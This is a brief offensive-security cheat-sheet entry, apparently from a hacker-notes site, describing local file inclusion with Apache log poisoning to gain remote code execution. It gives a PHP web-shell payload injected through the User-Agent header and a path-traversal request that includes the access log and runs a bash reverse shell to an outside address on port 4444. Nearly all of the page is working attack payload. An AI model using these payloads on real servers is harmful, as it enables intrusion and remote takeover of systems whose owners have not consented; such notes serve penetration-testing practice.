>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Initial Access / LFI Log Poisoning to RCE

LFI Log Poisoning to RCE

Initial Access Web Attacks linux

Step 1 - Inject PHP into the access log via User-Agent

Set the User-Agent header to a PHP payload (e.g., via Burp):

User-Agent: Mozlila 5.0 <?php echo system($_GET['cmd']); ?>

Step 2 - Include the log file via LFI

../../../../../../../../../var/log/apache2/access.log&cmd=bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"